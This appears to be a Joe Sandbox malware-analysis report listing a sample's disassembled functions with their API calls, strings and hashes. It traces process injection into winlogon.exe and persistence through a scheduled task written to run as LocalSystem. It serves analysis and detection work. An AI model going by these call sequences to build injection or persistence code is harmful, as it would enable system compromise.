                                                                                                                                                                                                              • Part of subcall function 004033A0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
                                                                                                                                                                                                              • Part of subcall function 004033A0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
                                                                                                                                                                                                              • Part of subcall function 004033A0: OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
                                                                                                                                                                                                              • Part of subcall function 004033A0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
                                                                                                                                                                                                              • Part of subcall function 004033A0: CloseHandle.KERNEL32(00000000), ref: 00403427
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403535
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 0040354E
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035AB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035F7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004035FE
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403616
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403630
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403653
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040366A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040367E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • 00-->, xrefs: 0040371F
                                                                                                                                                                                                            • <Actions , xrefs: 004036EA
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403477
                                                                                                                                                                                                            • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403454
                                                                                                                                                                                                            • task%d, xrefs: 0040353C
                                                                                                                                                                                                            • p=5w, xrefs: 0040382B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                            • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=5w$task%d
                                                                                                                                                                                                            • API String ID: 1601901853-2340070504
                                                                                                                                                                                                            • Opcode ID: d0b0790f7991d78f00ea7e7fde430ce6b596ebd0b63758b6d90d9f24c7b2decc
                                                                                                                                                                                                            • Instruction ID: fd62d51515435fe7aa577a9a46339635c431e4e957a39cb3738b378977d63dce
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0b0790f7991d78f00ea7e7fde430ce6b596ebd0b63758b6d90d9f24c7b2decc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5D1E0B2504301ABC720EF64CC48B5B7BA8EFC8751F048669FA45A72D1E774EA04CB99
                                                                                                                                                                                                            Function 004017F0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040181B
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401833
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040185D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401860
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401873
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401898
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 004018AC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004018CA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                            • memset.MSVCRT ref: 004018DD
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00401E65,000000FF,00000000,00000000), ref: 004018FF
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401913
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401933
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040193A
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040194A
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401967
                                                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040199B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004019AD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 004019B6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004019C2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004019C5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019D2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 004019D5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019DE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004019E1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401E65), ref: 004019F1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 004019F4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401E65), ref: 00401A01
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401A04
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 3422789474-2746444292
                                                                                                                                                                                                            • Opcode ID: 305985fe563536e86098805144d0a2e1e56e9e587e80ceb7f6eacc4e8f8e770f
                                                                                                                                                                                                            • Instruction ID: 7aa473d0462345c53030a0d843d553fe9ec79da9d6527bb3e9654a4a16b7ec1b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 305985fe563536e86098805144d0a2e1e56e9e587e80ceb7f6eacc4e8f8e770f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A6195B1A01215BBDB209FA58C45FAF7B6CEF84751F15422AFE14B72D0CA749D00CAA8
                                                                                                                                                                                                            Function 00401580 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                              • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                              • Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                              • Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                              • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                              • Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                              • Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,?,7702DB30,00402E38,winlogon.exe), ref: 004015AD
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7702DB30,00402E38,winlogon.exe), ref: 004015CC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 004016E8
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401711
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 0040177E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040178F
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 004017CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004017DD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 3542510048-3024904723
                                                                                                                                                                                                            • Opcode ID: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                            • Instruction ID: c9964d6c084eb6c4e09adf0a78a82ba29cca963801df753bbce45d31a4150425
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5571A3B1600315ABE710DFA4DD89F6F77B8AF84B04F144029FA05B72D1E7B8994587AC
                                                                                                                                                                                                            Function 00401C70 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 00401D1A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 00401D56
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 2979424695-2375045364
                                                                                                                                                                                                            • Opcode ID: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                            • Instruction ID: 6b572b3e0c1d36d44cadbb52a12c0b3f1dd55c4915d11e4f0b3c307bdf2881c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC21B972A0111467D7109BA5AD49B9E77A8EF89720F100276EA04F32E0EB34DD4556A9
                                                                                                                                                                                                            Function 004033A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004033C7
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 004033E9
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004033F0
                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403411
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00403427
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004033A9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                            • API String ID: 4133869067-1576788796
                                                                                                                                                                                                            • Opcode ID: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
                                                                                                                                                                                                            • Instruction ID: 021f6ab0fc676138f4263539a703c8a5ee641fdd4e06072bb68a67a5c5d36617
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 645d9aa35765d8fa00b4ca3d9b4e73897e66a258ba203d8b6412706febb71317
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E0188B5E00208EBEB20CFA0DD09B9A7BBCAB85701F4040A5E709B6280D6749F44CF75
                                                                                                                                                                                                            Function 00422380 Relevance: .8, Instructions: 833COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: fda0e8785c2b784ed165e1e2f0db2950fa3c2b4a98a8e5714da0227d163011df
                                                                                                                                                                                                            • Instruction ID: a443a6be7b6020440c066dd6ac9f13e6f3c101328c6206cdfb6017cdb3c45d4c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fda0e8785c2b784ed165e1e2f0db2950fa3c2b4a98a8e5714da0227d163011df
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 406217302042629FE715DF349EA8AAB7BE5EF9A300F44C959E885C7331DB74C909C799
                                                                                                                                                                                                            Function 0044599D Relevance: .8, Instructions: 789COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 24b898cc278001aa302173b1ebfbe9ab6da14a012747f73bc7f8226c98198e4a
                                                                                                                                                                                                            • Instruction ID: 4c2327c6d9ea0fd5f78b0127e51354d19f4113b4e822ec877585a6efb92c7c58
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24b898cc278001aa302173b1ebfbe9ab6da14a012747f73bc7f8226c98198e4a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD62BC70E00A269BEB0CCF55C4906EDBBB2FF85311F24826EC81667B85D778A955CF84
                                                                                                                                                                                                            Function 00433980 Relevance: .7, Instructions: 675COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d2bc618ccad3562935955a192db260dfb9d2e6bee5d337b6c715297b9bec9ce8
                                                                                                                                                                                                            • Instruction ID: 31199357ceec466129956888dd439b1d4a6f100edec160316ecfa63dcdc1427f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2bc618ccad3562935955a192db260dfb9d2e6bee5d337b6c715297b9bec9ce8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B42D371A002199FDB10DFA9C881AEFB7B1BF88304F54556EE446A7342D738BD45CBA8
                                                                                                                                                                                                            Function 00443BB0 Relevance: .5, Instructions: 504COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
                                                                                                                                                                                                            • Instruction ID: eac5d11cb92673f9bb66abbec7de51b37a046753e49d1a185180b8ac7a31a903
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5f03b92f91bc0fa13057e0a00df989dad41c0c834fe398416088b62e1f161a5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D122630A047859FEB25CF18C9806AEB7F1AF96710F14855FE4A68B391C738EE46CB54
                                                                                                                                                                                                            Function 00444280 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
                                                                                                                                                                                                            • Instruction ID: 021bb5d2b7c0cb56e537b8d227e73ed21d0ebdb26bc59c524461a715ef61eba8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbb3dbd4f1a7e42d557d55f1836cfda86b2050670afa8ddbabdc4c804d563f80
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC12F630A047849FEB15CF28C9807AEBBF1AF96314F14855EE8A64B791C738ED42CB54
                                                                                                                                                                                                            Function 004434E0 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
                                                                                                                                                                                                            • Instruction ID: c4f7584d98bb462e22f8ca5efa45b381d380756b5cf0509a019ae382a9018600
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00cb6110a2b699abd96713e289be10720307309afa9449c25425e0025887b9a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1121570A007859FEB25CF18C9806AEBBF1AF96711F14855FE4A68B351C738EE42CB54
                                                                                                                                                                                                            Function 00442250 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
                                                                                                                                                                                                            • Instruction ID: b7b9f9f22af13d42a5b6316f7f2a44174fcb43b43f91c23f0d1d097708033df0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 875064cff97081166aed1be67bd98ed2576c8f6fcc3bfcc6e64621cd83be4fae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F312E530A047859FEB25CF28CA8069A7BF1BF56310F54855EF8A58B381C778ED42CB64
                                                                                                                                                                                                            Function 00440A60 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
                                                                                                                                                                                                            • Instruction ID: c96630ca6486ca8a3dffba479f0708cf21e85e20dbdd268f71493559b7ccfc47
                                                                                                                                                                                                            • Opcode Fuzzy Hash: de9ff50583ee048039bb51e6425aa69cb088ad25014410a60100640d1a31ab45
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91021630A007459FEB24CF18C9806AFB7E1EF91314F14856FE9A68B391D738AD56C798
                                                                                                                                                                                                            Function 0043FE00 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1442178242.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_WlCVLbzNph.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 62266d2bb0fd7cb72f5456114ccefa61cd6d3619e0fa61cbae80b75a03c25a28
                                                                                                                                                                                                            • Instruction ID: b5c27d84d61b241dfbbeb53c51d0fdd6cf76b480a9746a7cf7f6d71d37627bea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62266d2bb0fd7cb72f5456114ccefa61cd6d3619e0fa61cbae80b75a03c25a28
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1702F330A007459FEB20CF28C9816AF77E1BF96310F14856FE9A58B391D738AD56CB94
